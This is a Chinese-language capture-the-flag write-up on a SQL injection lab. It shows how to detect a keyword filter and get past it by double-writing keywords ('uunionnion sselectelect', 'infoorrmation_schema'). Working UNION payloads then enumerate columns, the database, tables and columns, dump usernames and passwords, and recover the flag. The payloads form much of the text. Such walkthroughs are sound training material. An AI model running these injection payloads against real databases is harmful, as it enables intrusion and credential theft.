进入靶场,老办法随便输入看一下
第一步:找注入点
发现报错,看一下报错信息,好像是过滤了 or ,为了验证我们的猜想,我们输入其他语句试试
发现 oder by 变成 der 所以是对输入的数据做了过滤,or、by....这些都被过滤掉了,进一步测试看看都过滤了哪些
最后发现 select、by、or、union、where 这些关键字都被过滤了,那我们就试着绕过
绕过方法:
1、大小写绕过
2、双写绕过
试了,大小写绕过不行,使用双写绕过可行
双写绕过
解释一下双写绕过,他不是过滤 or 吗,那 oorr 中只有中间那个 or 符合过滤条件,把中间的 or 去掉,剩下的任然是 or
第二步:判断字段个数
1' oorrder bbyy 4#
四个还是大了,缩小到 3 就能正确返回,说明有 3 个字段
第三步:判断回显点
1' uunionnion sselectelect 1,2,3#
所以 2,3 是回显位置
第四步:爆破数据库名
1' uunionnion sselectelect 1,database(),3#
得到数据库名为:geek
第五步:爆破表格名
1' uunionnion sselectelect 1,database(),group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()#
这一步花了点时间去试,from 要双写,information 中有 or 所以里面的 or 也要双写
两张表:b4bsql、geekuser
第六步:爆破表的字段
1' uunionnion sselectelect 1,database(),group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'#
三个字段,把他们的值都获取出来
1' uunionnion sselectelect 1,database(),group_concat(id,username,passwoorrd) ffromrom b4bsql#
拿到flag
flag{1688d510-c510-47c4-9719-0deed12f79bc}